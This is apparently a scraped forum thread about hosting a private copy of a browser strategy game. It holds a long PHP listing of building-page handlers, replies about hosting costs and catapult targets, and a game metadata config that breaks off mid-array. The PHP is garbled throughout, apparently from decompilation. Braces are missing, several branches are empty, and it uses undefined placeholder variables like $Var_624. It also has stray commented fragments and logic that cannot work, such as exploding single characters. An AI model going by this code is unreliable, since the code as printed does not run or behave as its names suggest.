        if ( $_GET['k'] == $this->data['update_key'] && !isset( $this->queueModel->tasksInQueue[QS_TOWNHALL_CELEBRATION] ) && !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
            if ( intval( $_GET['a'] ) < 1 || 2 < intval( $_GET['a'] ) || intval( $_GET['a'] ) == 1 && $bLevel < $buildingMetadata['celebrations']['small']['level'] || intval( $_GET['a'] ) == 2 && $bLevel < $buildingMetadata['celebrations']['large']['level'] )
                $key = intval( $_GET['a'] ) == 2 ? "large" : "small";
                if ( !$this->isResourcesAvailable( $buildingMetadata['celebrations'][$key]['resources'] ) )
                    $calcConsume = intval( $buildingMetadata['celebrations'][$key]['time_consume'] / $this->gameSpeed * ( 10 / ( $bLevel + 9 ) ) );
                    $newTask = new QueueTask( QS_TOWNHALL_CELEBRATION, $this->player->playerId, $calcConsume );
                    $newTask->villageId = $this->data['selected_village_id'];
                    $newTask->procParams = intval( $_GET['a'] );
                    $newTask->tag = $buildingMetadata['celebrations'][$key]['resources'];
                    $this->queueModel->addTask( $newTask );

	/*public function handleResidencePalace( ){
		$this->selectedTabIndex = is_numeric($_GET['t']) && 1 <= intval( $_GET['t'] ) && intval( $_GET['t'] ) <= 3 ? intval( $_GET['t'] ) : 0;
        $_bid_ = $this->buildings[$this->buildingIndex]['item_id'];
        if ( $this->selectedTabIndex == 0 )
            if ( isset( $_GET['mc'] ) && !$this->data['is_capital'] && !$this->data['is_special_village'] && $_bid_ == 26 )
                $this->data['is_capital'] = TRUE;
                $m = new BuildModel( );
                $m->makeVillageAsCapital( $this->player->playerId, $this->data['selected_village_id'] );
                $m->dispose( );
            $this->childVillagesCount = 0;
            if ( trim( $this->data['child_villages_id'] ) != "" )
                $this->childVillagesCount = sizeof( explode( ",", $this->data['child_villages_id'] ) );
            $itemId = $this->buildings[$this->buildingIndex]['item_id'];
            $buildingLevel = $this->buildings[$this->buildingIndex]['level'];
            $this->troopsUpgradeType = QS_TROOP_TRAINING;
            $this->_getOnlyMyTroops( );
            $this->troopsUpgrade = array( );
            $_arr = explode( ",", $this->data['troops_training'] );
            foreach ( $_arr as $troopStr )
                $attack_level = explode( " ", $troopStr[3] );
                $defense_level = explode( " ", $troopStr[2] );
                $researches_done = explode( " ", $troopStr[1] );
                $troopId = explode( " ", $troopStr[0] );
                if ( $researches_done == 1 && $this->_canTrainInBuilding( $troopId, $itemId ) )
                    $this->troopsUpgrade[] = array( "troopId" => $troopId, "maxNumber" => $this->_getMaxTrainNumber( $troopId, $itemId ), "currentNumber" => $this->_getCurrentNumberFor( $troopId, $itemId ) );
            $this->showBuildingForm = FALSE;
            if ( $buildingLevel < 10 || 2 <= $this->childVillagesCount && $_bid_ == 25 || 3 <= $this->childVillagesCount && $_bid_ == 26 || $this->childVillagesCount == 1 && $buildingLevel < 20 && $_bid_ == 25 || $this->childVillagesCount == 1 && $buildingLevel < 15 && $_bid_ == 26 || $this->childVillagesCount == 2 && $buildingLevel < 20 && $_bid_ == 26 )
                $this->troopsUpgrade = array( );
                if ( 1 < sizeof( $this->troopsUpgrade ) )
                    if ( 1 <= $this->troopsUpgrade[0]['currentNumber'] || 3 <= $this->troopsUpgrade[1]['currentNumber'] )
                        $this->troopsUpgrade = array( );
                        if ( 0 < $this->troopsUpgrade[1]['currentNumber'] )
                            unset( $Var_4224[0] );
                else if ( 3 <= $this->troopsUpgrade[0]['currentNumber'] )
                    $this->troopsUpgrade = array( );
                $this->showBuildingForm = 0 < sizeof( $this->troopsUpgrade );
            if ( $this->isPost( ) && isset( $_POST['tf'] ) && !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
                foreach ( $_POST['tf'] as $troopId => $num )
                    $num = intval( $num );
                    $existsTroop = FALSE;
                    foreach ( $this->troopsUpgrade as $troop )
                        if ( $troop['troopId'] == $troopId )
                            $existsTroop = TRUE;
                    if ( $num <= 0 || !$existsTroop || $this->_getMaxTrainNumber( $troopId, $itemId ) < $num )
                    $troopMetadata = $this->gameMetadata['troops'][$troopId];
                    $calcConsume = intval( $troopMetadata['training_time_consume'] / $this->gameSpeed * ( 10 / ( $this->buildProperties['building']['level'] + 9 ) ) );
                    $newTask = new QueueTask( $this->troopsUpgradeType, $this->player->playerId, $calcConsume );
                    $newTask->threads = $num;
                    $newTask->villageId = $this->data['selected_village_id'];
                    $newTask->buildingId = $this->buildProperties['building']['item_id'];
                    $newTask->procParams = $troopId;
                    $newTask->tag = $troopMetadata['training_resources'];
                    $this->queueModel->addTask( $newTask );
            if ( $this->selectedTabIndex == 1 )
                $this->neededCpValue = $this->totalCpRate = $this->totalCpValue = 0;
                $m = new BuildModel( );
                $result = $m->getVillagesCp( $this->data['villages_id'] );
                while ( $result->next( ) )
                    $cpRate = explode( " ", $result->row['cp'][1] );
                    $this->cpValue = explode( " ", $result->row['cp'][0] );
                    //$ && _39643752 += "cpValue";
                    //$ && _39643848 += "totalCpRate";
                    //$ && _39643880 += "totalCpValue";
                    //$ && _39643880 += "neededCpValue";
                $this->totalCpValue = floor( $this->totalCpValue );
                $m->dispose( );
                if ( $this->selectedTabIndex == 3 )
                    $this->childVillages = array( );
                    $m = new BuildModel( );
                    $result = $m->getChildVillagesFor( trim( $this->data['child_villages_id'] ) );
                    while ( $result != NULL && $result->next( ) )
                        $this->childVillages[$result->row['id']] = array( "id" => $result->row['id'], "rel_x" => $result->row['rel_x'], "rel_y" => $result->row['rel_y'], "village_name" => $result->row['village_name'], "people_count" => $result->row['people_count'], "creation_date" => $result->row['creation_date'] );
                    $m->dispose( );

    public function handleHerosMansion( )
        $this->selectedTabIndex = isset( $_GET['t'] ) && is_numeric( $_GET['t'] ) && intval( $_GET['t'] ) == 1 ? intval( $_GET['t'] ) : 0;
        if ( $this->selectedTabIndex == 0 )
            $this->hasHero = 0 < intval( $this->data['hero_troop_id'] );
            $this->troopsUpgradeType = QS_TROOP_TRAINING_HERO;
            if ( !$this->hasHero )
                $this->_getOnlyMyTroops( TRUE );
                if ( $_GET['k'] == $this->data['update_key'] && !isset( $this->queueModel->tasksInQueue[$this->troopsUpgradeType] ) && isset( $this->troops[intval( $_GET['a'] )] ) && 0 < $this->troops[intval( $_GET['a'] )] && !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
                    $troopId = intval( $_GET['a'] );
                    $troopMetadata = $this->gameMetadata['troops'][$troopId];
                    $nResources = array( "1" => $troopMetadata['training_resources'][1] * 2, "2" => $troopMetadata['training_resources'][2] * 2, "3" => $troopMetadata['training_resources'][3] * 2, "4" => $troopMetadata['training_resources'][4] * 2 );
                    if ( !$this->isResourcesAvailable( $nResources ) )
                        $calcConsume = intval( $troopMetadata['training_time_consume'] / $this->gameSpeed * ( 10 / ( $this->buildProperties['building']['level'] + 9 ) ) ) * 12;
                        $newTask = new QueueTask( $this->troopsUpgradeType, $this->player->playerId, $calcConsume );
                        $newTask->procParams = $troopId." ".$this->data['selected_village_id'];
                        $newTask->tag = $nResources;
                        $this->queueModel->addTask( $newTask );
                if ( $this->isPost( ) && isset( $_POST['hname'] ) && trim( $_POST['hname'] ) != "" )
                    $this->data['hero_name'] = trim( $_POST['hname'] );
                    $m = new BuildModel( );
                    $m->changeHeroName( $this->player->playerId, $this->data['hero_name'] );
                    $m->dispose( );
            if ( $this->selectedTabIndex == 1 )
                $this->villageOases = array( );
                $m = new BuildModel( );
                $result = $m->getVillageOases( trim( $this->data['village_oases_id'] ) );
                while ( $result != NULL && $result->next( ) )
                    $this->villageOases[$result->row['id']] = array( "id" => $result->row['id'], "rel_x" => $result->row['rel_x'], "rel_y" => $result->row['rel_y'], "image_num" => $result->row['image_num'], "allegiance_percent" => $result->row['allegiance_percent'] );
                $m->dispose( );
                if ( !$this->isGameTransientStopped( ) && !$this->isGameOver( ) )
                    $oasisId = intval( $_GET['a'] );
                    $newTask = new QueueTask( QS_LEAVEOASIS, $this->player->playerId, floor( 21600 / $this->gameSpeed ) );
                    $newTask->villageId = $this->data['selected_village_id'];
                    $newTask->buildingId = $oasisId;
                    $newTask->procParams = $this->villageOases[$oasisId]['rel_x']." ".$this->villageOases[$oasisId]['rel_y'];
                    $this->queueModel->addTask( $newTask );
                    if ( isset( $_GET['qid'] ) && 0 < intval( $_GET['qid'] ) )
                        $this->queueModel->cancelTask( $this->player->playerId, intval( $_GET['qid'] ) );

    public function preRender( )
        //( );
        if ( isset( $_GET['p'] ) )
            //$ && _41448384 .= "villagesLinkPostfix";
        if ( isset( $_GET['vid2'] ) )
            //$ && _41448784 .= "villagesLinkPostfix";
        if ( 0 < $this->selectedTabIndex )
           // $ && _41448984 .= "villagesLinkPostfix";

    public function __getCoordInRange( $map_size, $x )
        if ( $map_size <= $x )
            $x -= $map_size;
        else if ( $x < 0 )
            $x = $map_size + $x;
        return $x;

    public function __getVillageId( $map_size, $x, $y )
        return $x * $map_size + ( $y + 1 );

    public function _getOnlyMyOuterTroops( )
        $returnTroops = array( );
        if ( trim( $this->data['troops_out_num'] ) != "" )
            $t_arr = explode( "|", $this->data['troops_out_num'] );
            foreach ( $t_arr as $t_str )
                $t2_arr = explode( ":", $t_str );
                $t2_arr = explode( ",", $t2_arr[1] );
                foreach ( $t2_arr as $Var_720 )
                    $t = explode( " ", $t2_str );
                    if ( $t[1] == 0 - 1 )
                    if ( isset( $returnTroops[$t[0]] ) )
                        $returnTroops += $t[0];
                        $returnTroops[$t[0]] = $t[1];
        if ( trim( $this->data['troops_out_intrap_num'] ) != "" )
            $t_arr = explode( "|", $this->data['troops_out_intrap_num'] );
            foreach ( $t_arr as $t_str )
                $t2_arr = explode( ":", $t_str );
                $t2_arr = explode( ",", $t2_arr[1] );
                foreach ( $t2_arr as $t2_str )
                    $t = explode( " ", $t2_str );
                    if ( $t[1] == 0 - 1 )
                    if ( isset( $returnTroops[$t[0]] ) )
                        $returnTroops += $t[0];
                        $returnTroops[$t[0]] = $t[1];
        return $returnTroops;

    public function _getOnlyMyTroops( $toBeHero = FALSE )
        $t_arr = explode( "|", $this->data['troops_num'] );
        foreach ( $t_arr as $t_str )
            $t2_arr = explode( ":", $t_str );
            if ( $t2_arr[0] == 0 - 1 )
                $t2_arr = explode( ",", $t2_arr[1] );
                foreach ( $t2_arr as $t2_str )
                    $t = explode( " ", $t2_str );
                    if ( $toBeHero && ( $t[0] == 99 || $t[0] == 7 || $t[0] == 8 || $t[0] == 9 || $t[0] == 10 || $t[0] == 17 || $t[0] == 18 || $t[0] == 19 || $t[0] == 20 || $t[0] == 27 || $t[0] == 28 || $t[0] == 29 || $t[0] == 30 || $t[0] == 106 || $t[0] == 107 || $t[0] == 108 || $t[0] == 109 || $t[0] == 57 || $t[0] == 58 || $t[0] == 59 || $t[0] == 60 ) )
                    if ( isset( $this->troops[$t[0]] ) )
                        $this->troops += $t[0];
                        $this->troops[$t[0]] = $t[1];
        if ( !$toBeHero && !isset( $this->troops[99] ) )
            $this->troops[99] = 0;

    public function _getMaxBuildingLevel( $itemId )
        $result = 0;
        foreach ( $this->buildings as $villageBuild )
            if ( $villageBuild['item_id'] == $itemId && $result < $villageBuild['level'] )
                $result = $villageBuild['level'];
        return $result;

    public function _getCurrentNumberFor( $troopId, $item )
        $num = 0;
        if ( isset( $this->troops[$troopId] ) )
            $num += $this->troops[$troopId];
        if ( isset( $this->queueModel->tasksInQueue[$this->troopsUpgradeType], $this->queueModel->tasksInQueue[$this->troopsUpgradeType][$item] ) )
            $qts = $this->queueModel->tasksInQueue[$this->troopsUpgradeType][$item];
            foreach ( $qts as $qt )
                if ( $qt['proc_params'] == $troopId )
                    $num += $qt['threads'];
        $num += $this->_getTroopCountInTransfer( $troopId, QS_WAR_REINFORCE );
        $num += $this->_getTroopCountInTransfer( $troopId, QS_WAR_ATTACK );
        $num += $this->_getTroopCountInTransfer( $troopId, QS_WAR_ATTACK_PLUNDER );
        $num += $this->_getTroopCountInTransfer(  );
        $num += $this->_getTroopCountInTransfer( $troopId, QS_CREATEVILLAGE );
        $ts = $this->_getOnlyMyOuterTroops( );
        if ( isset( $ts[$troopId] ) )
            $num += $ts[$troopId];
        return $num;

    public function _getTroopCountInTransfer( $troopId, $type )
        $num = 0;
        if ( isset( $this->queueModel->tasksInQueue[$type] ) )
            $qts = $this->queueModel->tasksInQueue[$type];
            foreach ( $qts as $qt )
                $arr = explode( "|", $qt['proc_params'] );
                $arr = explode( ",", $arr[0] );
                foreach ( $arr as $arrStr )
                    $tnum = explode( " ", $arrStr[1] );
                    $tid = explode( " ", $arrStr[0] );
                    if ( $tid == $troopId )
                        $num += $tnum;
        return $num;

    public function _getMaxTrainNumber( $troopId, $item )
        $max = 0;
        $_f = TRUE;
        foreach ( $this->gameMetadata['troops'][$troopId]['training_resources'] as $k => $v )
            $num = floor( $this->resources[$k]['current_value'] / ( $v * $Var_624 ) );
            if ( $num < $max || $_f )
                $_f = FALSE;
                $max = $num;
        if ( $troopId == 99 )
            $buildingMetadata = $this->gameMetadata['items'][$this->buildings[$this->buildingIndex]['item_id']]['levels'][$this->buildProperties['building']['level'] - 1];
            $_maxValue = $buildingMetadata['value'] - $this->troops[$troopId];
            if ( isset( $this->queueModel->tasksInQueue[$this->buildProperties['building']['item_id']],$this->queueModel->tasksInQueue[$this->troopsUpgradeType], $this->queueModel->tasksInQueue[$this->troopsUpgradeType] ) )
                $qts = $this->queueModel->tasksInQueue[$this->troopsUpgradeType][$this->buildProperties['building']['item_id']];
                foreach ( $qts as $qt )
                    if ( $qt['proc_params'] == $troopId )
                        $_maxValue -= $qt['threads'];
            if ( $_maxValue < $max )
                $max = $_maxValue;
        else if ( $item == 25 || $item == 26 )
            $_maxValue = $troopId == 9 || $troopId == 19 || $troopId == 29 || $troopId == 108 || $troopId == 59 ? 1 : 3;
            $_maxValue -= $this->_getCurrentNumberFor( $troopId, $item );
            if ( $_maxValue < $max )
                $max = $_maxValue;
        return $max < 0 ? 0 : $max;

    public function _canTrainInBuilding( $troopId, $itemId )
        foreach ( $this->gameMetadata['troops'][$troopId]['trainer_building'] as $buildingId )
            if ( $buildingId == $itemId )
                return TRUE;
        return FALSE;

    public function _canDoResearches( $troopId )
        foreach ( $this->gameMetadata['troops'][$troopId]['pre_requests'] as $req_item_id => $level )
            $result = FALSE;
            foreach ( $this->buildings as $villageBuild )
                if ( $villageBuild['item_id'] == $req_item_id && $level <= $villageBuild['level'] )
                    $result = TRUE;
            if ( !$result )
                return FALSE;
        return TRUE;

    public function getNeededTime( $neededResources )
        $timeInSeconds = 0;
        foreach ( $neededResources as $k => $v )
            if ( !( $this->resources[$k]['current_value'] < $v ) )
            else if ( $this->resources[$k]['calc_prod_rate'] <= 0 )
                return 0 - 1;
                $time = ( $v - $this->resources[$k]['current_value'] ) / $this->resources[$k]['calc_prod_rate'];
                if ( $timeInSeconds < $time )
                    $timeInSeconds = $time;
        return ceil( $timeInSeconds * 3600 );

    public function getActionText4( $neededResources, $url, $text, $Var_72, $buildLevel, $troopLevel )
        if ( isset( $this->queueModel->tasksInQueue[$queueTaskType] ) )
            return "<span class=\"none\">".buildings_p_plwait."</span>";
        if ( $buildLevel <= $troopLevel )
            return "<span class=\"none\">".buildings_p_needmorecapacity."</span>";
        return !$this->isResourcesAvailable( $neededResources ) ? "<span class=\"none\">".buildings_p_notenoughres."</span>" : "<a class=\"build\" href=\"build.php?id=".$this->buildingIndex."&".$url."&k=".$this->data['update_key']."\">".$text."</a>";

    public function getActionText3( $neededResources, $url, $text, $queueTaskType )
        if ( isset( $this->queueModel->tasksInQueue[$queueTaskType] ) )
            return "<span class=\"none\">".buildings_p_plwait."</span>";
        return !$this->isResourcesAvailable( $neededResources ) ? "<span class=\"none\">".buildings_p_notenoughres."</span>" : "<a class=\"build\" href=\"build.php?id=".$this->buildingIndex."&".$url."&k=".$this->data['update_key']."\">".$text."</a>";

    public function getActionText2( $neededResources )
        $needUpgradeType = $this->needMoreUpgrades( $neededResources );
        if ( 0 < $needUpgradeType )
            switch ( $needUpgradeType )
                case 2 :
                    return "<span class=\"none\">".buildings_p_upg1."</span>";
                case 3 :
                    return "<span class=\"none\">".buildings_p_upg2."</span>";
                case 4 :
                    return "<span class=\"none\">".buildings_p_upg3."</span>";
        if ( !$this->isResourcesAvailable( $neededResources ) )
            $neededTime = $this->getNeededTime( $neededResources );
            return "<span class=\"none\">".( 0 < $neededTime ? $Tmp_38 : buildings_p_notenoughres2 )."</span>";
        return "";

    public function getActionText( $neededResources, $isField, $upgrade, $item_id )
        $needUpgradeType = $this->needMoreUpgrades( $neededResources, $item_id );
        if ( 0 < $needUpgradeType )
            switch ( $needUpgradeType )
                case 1 :
                    return "<span class=\"none\">".buildings_p_upg0."</span>";
                case 2 :
                    return "<span class=\"none\">".buildings_p_upg1."</span>";
                case 3 :
                    return "<span class=\"none\">".buildings_p_upg2."</span>";
                case 4 :
                    return "<span class=\"none\">".buildings_p_upg3."</span>";
            $pageNamePostfix = "2";
            $link = "<a class=\"build\" href=\"village2.php?id=".$this->buildingIndex."&b=".$item_id."&k=".$this->data['update_key']."\">".buildings_p_create_newbuild."</a>";
            $workerResult = $this->isWorkerBusy( $isField );
            return $link.( "" );
        $neededTime = $this->getNeededTime( $neededResources );
        return "<span class=\"none\">".( buildings_p_notenoughres2 )."</span>";

    public function _canAcceptOffer( $needResources, $giveResources, $villageId, $onlyForAlliance, $allianceId, $maxTime, $distance )
        if ( $villageId == $this->data['selected_village_id'] )
            return 0;
        if ( !$this->isResourcesAvailable( $giveResources ) )
            return 1;
        $needMerchantCount = ceil( ( $giveResources[1] + $Var_456 + $giveResources[3] + $giveResources[4] ) / $this->merchantProperty['capacity'] );
        if ( $needMerchantCount == 0 || $this->merchantProperty['exits_num'] < $needMerchantCount )
            return 2;
        if ( $onlyForAlliance && ( intval( $this->data['alliance_id'] ) == 0 || $allianceId != intval( $this->data['alliance_id'] ) ) )
            return 3;
        if ( 0 < $maxTime && $maxTime < $distance / $this->merchantProperty['speed'] )
            return 4;
        return 5;

    public function getNextLink( )
        $text = "»";
        if ( $this->pageIndex + 1 == $this->pageCount )
            return $text;
        $link = "";
        if ( 0 < $this->selectedTabIndex )
            $link .= "t=".$this->selectedTabIndex;
        if ( $link != "" )
            $link .= "&";
        $link .= "p=".( $this->pageIndex + 1 );
        $link = "build.php?id=".$this->buildingIndex."&".$link;
        return "<a href=\"".$link."\">".$text."</a>";

    public function getPreviousLink( )
        $text = "«";
        if ( $this->pageIndex == 0 )
            return $text;
        $link = "";
        if ( 0 < $this->selectedTabIndex )
            $link .= "t=".$this->selectedTabIndex;
        if ( 1 < $this->pageIndex )
            if ( $link != "" )
                $link .= "&";
            $link .= "p=".( $this->pageIndex - 1 );
        $link = "build.php?id=".$this->buildingIndex."&".$link;
        return "<a href=\"".$Var_744."\">".$text."</a>";

    public function getResourceGoldExchange( $neededResources, $itemId, $buildingIndex, $multiple = FALSE )
        if ( $this->data['gold_num'] < $this->gameMetadata['plusTable'][6]['cost'] || 0 < $this->needMoreUpgrades( $neededResources, $itemId ) || $this->isResourcesAvailable( $neededResources ) && !$multiple )
            return "";
        $s1 = 0;
        $s2 = 0;
        $exchangeResource = "";
        foreach ( $neededResources as $k => $v )
            $s1 += $v;
            $s2 += $this->resources[$k]['current_value'];
            if ( $exchangeResource != "" )
                $exchangeResource .= "&";
            $exchangeResource .= "r".$k."=".$v;
        $canExchange = $s1 <= $s2;
        if ( $multiple && $canExchange )
            $num = floor( $s2 / $s1 );
            $exchangeResource = "";
            foreach ( $neededResources as $k => $v )
                if ( $exchangeResource != "" )
                    $exchangeResource .= "&";
                $exchangeResource .= "r".$k."=".$v * $num;
        return " | <a href=\"build.php?bid=17&t=3&rid=".$buildingIndex."&".$exchangeResource."\" title=\"".buildings_p_m2m."\"><img class=\"npc".( $canExchange ? "" : "_inactive" )."\" src=\"assets/x.gif\" alt=\"".buildings_p_m2m."\" title=\"".buildings_p_m2m."\"></a>";


$p = new GPage( );
$p->run( );
Junior Spellweaver
Jan 11, 2012
Reaction score
thank you ubi, i find a new problem, catapult of arab don't appare in blacksmith and armoury

ubi ,what is the host of you server,do you have this problem of overloaded and how cost /month ?

ubi, with thi i can't catapult great warehouse,greatgranary and ww,you can control it?

My host is a private one, It's a person I know so I get discount but normally it would be around $50 monthly. I do not get any overloading problem because my bandwith allocation is unlimited. The catapult of the arabs not showing up maybe from your metadata.php file, check to make sure you actually have the catapult created inside metadata.

The catapults can't destroy ww, great warehouse and great granay because if you look at your code it does not include them. Just include the building ids of the WW, Great Warehouse, and Great Granary then the catapults will be able to destroy them also.
Newbie Spellweaver
Apr 1, 2012
Reaction score
this is my metadata


$SetupMetadata = array (


 * the game map size


'map_size'=> 400,// ranged from 400 to -400


 *  the maps for the village field

 *    key is the name of the image for the field

 *    the array value carry the items id only for the resources

 *    1 = wood, 2 = clay, 3 = iron, 4 = crop


'field_maps_summary' => array (

'1'=> '3-3-3-9',

'2'=> '3-4-5-6',

'3'=> '4-4-4-6',

'4'=> '4-5-3-6',

'5'=> '5-3-4-6',

'6'=> '1-1-1-15',

'7'=> '4-4-3-7',

'8'=> '3-4-4-7',

'9'=> '4-3-4-7',

'10'=> '3-5-4-6',

'11'=> '4-3-5-6',

'12'=> '5-4-3-6',


'field_maps' => array (

'1'=> array ( 4,4,1,4,4,2,3,4,4,3,3,4,4,1,4,2,1,2 ),

'2'=> array ( 3,4,1,3,2,2,3,4,4,3,3,4,4,1,4,2,1,2 ),

'3'=> array ( 1,4,1,3,2,2,3,4,4,3,3,4,4,1,4,2,1,2 ),// registable village ( default village )

'4'=> array ( 1,4,1,2,2,2,3,4,4,3,3,4,4,1,4,2,1,2 ),

'5'=> array ( 1,4,1,3,1,2,3,4,4,3,3,4,4,1,4,2,1,2 ),

'6'=> array ( 4,4,1,3,4,4,4,4,4,4,4,4,4,4,4,2,4,4 ),// crop village

'7'=> array ( 1,4,4,1,2,2,3,4,4,3,3,4,4,1,4,2,1,2 ),

'8'=> array ( 3,4,4,1,2,2,3,4,4,3,3,4,4,1,4,2,1,2 ),

'9'=> array ( 3,4,4,1,1,2,3,4,4,3,3,4,4,1,4,2,1,2 ),

'10'=> array ( 3,4,1,2,2,2,3,4,4,3,3,4,4,1,4,2,1,2 ),

'11'=> array ( 3,1,1,3,1,4,4,3,3,2,2,3,1,4,4,2,4,4 ),

'12'=> array ( 1,4,1,1,2,2,3,4,4,3,3,4,4,1,4,2,1,2 ),



 * the type of oases

 *   ex: 1 => 25 mean, Increase +25% lumber per hour


 'oasis' => array (

'1'   => array( '1' => 25 ),

'2'   => array( '1' => 25 ),

'3'   => array( '1' => 25, '4' => 25 ),

'4'   => array( '2' => 25 ),

'5'   => array( '2' => 25 ),

'6'   => array( '2' => 25, '4' => 25 ),

'7'   => array( '3' => 25 ),

'8'   => array( '3' => 25 ),

'9'   => array( '3' => 25, '4' => 25 ),

'10' => array( '4' => 25 ),

'11' => array( '4' => 25 ),

'12' => array( '4' => 50 ),



$GameMetadata = array (


 * the speed of the game

 *   this speed value affect the consumed time for building, troop training and troop researching

 *   the default value is 1,

 *   the value 3 mean the consumped time will be less than the default time by ratio 1/3


'game_speed' => 50,


 * the needed civil points (depend upon the game speed)

 *   for each new village


'cp_for_new_village' => 2000,


 * the player protection period (depend upon the game speed)

 *  this is the normal protection period for the player after registration

 *  unit in seconds


'player_protection_period'=> 259200,// 3 days = (3 * 24 * 60 * 60) = 259200


 * the player session time out

 * unit in minute


'session_timeout' => 5,


 *  tribes of the game

 *    key is the id for the tribe

 *    dual_build: can build or upgrade by default a field and building at the same time

 *    merchants_capacity: the default capacity for the merchants

 *    merchants_velocity: the default velocity for the merchants

 *    crannyFactor: the enemy can only save this factor from its total cranny size

 *    wall_css: the css name for the wall that used in the village2.php page


'tribes' => array (

'1'=> array ( 'dual_build' => TRUE,   'merchants_capacity' => 500,   'merchants_velocity' => 16,'crannyFactor' => 1,'wall_css' => 'd2_11'  ),// ???????

'2'=> array ( 'dual_build' => FALSE, 'merchants_capacity' => 1000, 'merchants_velocity' => 12,'crannyFactor' => 2/3,'wall_css' => 'd2_12'  ),// ???????

'3'=> array ( 'dual_build' => FALSE, 'merchants_capacity' => 750,   'merchants_velocity' => 24,'crannyFactor' => 1,'wall_css' => 'd2_1'  ),// ???????

'4'=> array ( 'dual_build' => FALSE, 'merchants_capacity' => 0,       'merchants_velocity' => 0,'crannyFactor' => 1,'wall_css' => ''  ),// ??????

'5'=> array ( 'dual_build' => FALSE, 'merchants_capacity' => 0,       'merchants_velocity' => 0,'crannyFactor' => 1,'wall_css' => ''  ),// ??????

'6'=> array ( 'dual_build' => TRUE,   'merchants_capacity' => 1500,  'merchants_velocity' => 22,'crannyFactor' => 2/3,'wall_css' => 'd2_11'  ),// ????

'7'=> array ( 'dual_build' => TRUE,  'merchants_capacity' => 1200,  'merchants_velocity' => 20,'crannyFactor' => 1,'wall_css' => 'd2_11' ),// ?????



 * the time and gold number need for plus feature


'plusTable' => array (

array ( 'time' => 7, 'cost' => 10),

array ( 'time' => 7, 'cost' =>  5),

array ( 'time' => 7, 'cost' =>  5),

array ( 'time' => 7, 'cost' =>  5),

array ( 'time' => 7, 'cost' =>  5),

array ( 'time' => 0, 'cost' =>  2),

array ( 'time' => 0, 'cost' =>  3),

array ( 'time' => 0, 'cost' =>  15)



 * the type of medals

 *   ex: bbcode = 0 , then it write like that [#0]


'medals' => array (

array ( 'textIndex' => 0,'BBCode' => '0', 'cssClass' => 'tn' ),

// for players

array ( 'textIndex' => 1,'BBCode' => '10000', 'cssClass' => 't1' ),// ?????? ???????

array ( 'textIndex' => 2,'BBCode' => '20000', 'cssClass' => 't2' ),// ??????? ???????

array ( 'textIndex' => 3,'BBCode' => '30000', 'cssClass' => 't3' ),// ??????? ???????

array ( 'textIndex' => 4,'BBCode' => '40000', 'cssClass' => 't4' ),// ?????? ???????

// for alliance

array ( 'textIndex' => 1,'BBCode' => '50000', 'cssClass' => 'a1' ),// ?????? ???????

array ( 'textIndex' => 2,'BBCode' => '60000', 'cssClass' => 'a2' ),// ??????? ???????

array ( 'textIndex' => 3,'BBCode' => '70000', 'cssClass' => 'a3' ),// ??????? ???????

array ( 'textIndex' => 4,'BBCode' => '80000', 'cssClass' => 'a4' ),// ?????? ???????




 *  the troops for all tribes

 *    key is the id of the troop

 *    for_tribe_id: = the tribe id, so this troop only available for this tribe

 *    velocity: the default speed for the troop

 *    carry_load: the value that troop can harvest from the enemy resources at attack

 *    crop_consumption: consumption of crop from the village crop production rate

 *    attack_value: the strength of attack

 *    defense_infantry: the defense against the non cavalry troops

 *    defense_cavalry: the defense against the cavalry troops

 *    is_cavalry: is a cavalry troop

 *    gold_needed: the need golds to buy only one troop

 *    research_time_consume: the time in seconds, that consumed to do researching for that troop in academy building

 *    training_time_consume: the time in seconds, that consumed to do training for that troop in war building

 *    trainer_building: the item(s) id for building that do training for that troop 

 *    research_resources: the resources that needed for researching, 1=wood 2=clay 3=iron 4=crop

 *    training_resources: the resources that needed for training, 1=wood 2=clay 3=iron 4=crop

 *    pre_requests: the pre-requests to do researching for that troop ( item_id => item_level )


'troops' => array (

'1'=> array(

'for_tribe_id' => 1, 'velocity' => 6, 'carry_load' => 40, 'crop_consumption' => 1, 'attack_value' => 40, 'defense_infantry' => 35, 'defense_cavalry' => 50, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 0,

'training_time_consume' => 2000,

'trainer_building' => array( 19,29 ),

'research_resources' => array( ),

'training_resources'   => array( '1' => 120, '2' => 100, '3' => 180, '4' => 40 ),

'pre_requests' => array( )


'2'=> array(

'for_tribe_id' => 1, 'velocity' => 5, 'carry_load' => 20, 'crop_consumption' => 1, 'attack_value' => 30, 'defense_infantry' => 65, 'defense_cavalry' => 35, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 8400,

'training_time_consume' => 2200,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 700, '2' => 620, '3' => 1480, '4' => 580 ),

'training_resources'   => array( '1' => 100, '2' => 130, '3' => 160, '4' => 70 ),

'pre_requests' => array( '22' => 1, '13' => 1 )


'3'=> array(

'for_tribe_id' => 1, 'velocity' => 7, 'carry_load' => 50, 'crop_consumption' => 1, 'attack_value' => 70, 'defense_infantry' => 40, 'defense_cavalry' => 25, 'is_cavalry' => FALSE, 

'gold_needed'=> 1,

'research_time_consume' => 9000,

'training_time_consume' => 2400,

'trainer_building' => array( 19,29 ),

'research_resources' => array( '1' => 1000, '2' => 740, '3' => 1880, '4' => 640 ),

'training_resources'   => array( '1' => 150, '2' => 160, '3' => 210, '4' => 80 ),

'pre_requests' => array( '22' => 5, '12' => 1 )


'4'=> array(

'for_tribe_id' => 1, 'velocity' => 16, 'carry_load' => 0, 'crop_consumption' => 2, 'attack_value' => 0, 'defense_infantry' => 20, 'defense_cavalry' => 10, 'is_cavalry' => TRUE, 

'gold_needed'=> 1,

'research_time_consume' => 6900,

'training_time_consume' => 1700,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 940, '2' => 740, '3' => 360, '4' => 400 ),

'training_resources'   => array( '1' => 140, '2' => 160, '3' => 20, '4' => 40 ),

'pre_requests' => array( '20' => 1, '22' => 5 )


'5'=> array(

'for_tribe_id' => 1, 'velocity' => 14, 'carry_load' => 100, 'crop_consumption' => 3, 'attack_value' => 120, 'defense_infantry' => 65, 'defense_cavalry' => 50, 'is_cavalry' => TRUE, 

'gold_needed'=> 2,

'research_time_consume' => 11700,

'training_time_consume' => 3300,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 3400, '2' => 1860, '3' => 2760, '4' => 760 ),

'training_resources'   => array( '1' => 550, '2' => 440, '3' => 320, '4' => 100 ),

